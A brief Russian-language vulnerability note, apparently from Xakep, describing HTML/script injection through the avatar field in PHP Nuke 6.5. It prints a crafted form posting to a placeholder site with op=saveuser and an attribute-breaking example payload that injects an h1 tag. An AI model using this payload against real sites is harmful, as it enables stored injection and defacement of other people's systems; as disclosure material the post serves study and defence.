Рекомендуем почитать:
Xakep #305. Многошаговые SQL-инъекции
В PHP Nuke 6.5 можно внедрить произвольный HTML
или Java код вместо своего картинки-аватары.
Можно подредактировать регистрационную
форму
<!-- START CODE --!>
<form name="Register"
action="http://NUKEDSITE/modules.php?name=Your_Account" method="post">
<b>Code ('">[code]<b ')</b><input type="text"
name="user_avatar" size="30"
maxlength="30"><br><br>
<b>Username</b><input type="text" name="uname"
size="30"
maxlength="255"><br><b>User ID:<input type="text"
name="uid"
size="30"><input type="hidden" name="op"
value="saveuser"><input
type="submit" value="Save Changes"></form>
<!-- END CODE --!>
и вставить произвольный код вместо
аватары. Например:
"><h1>TESTING</h1><b
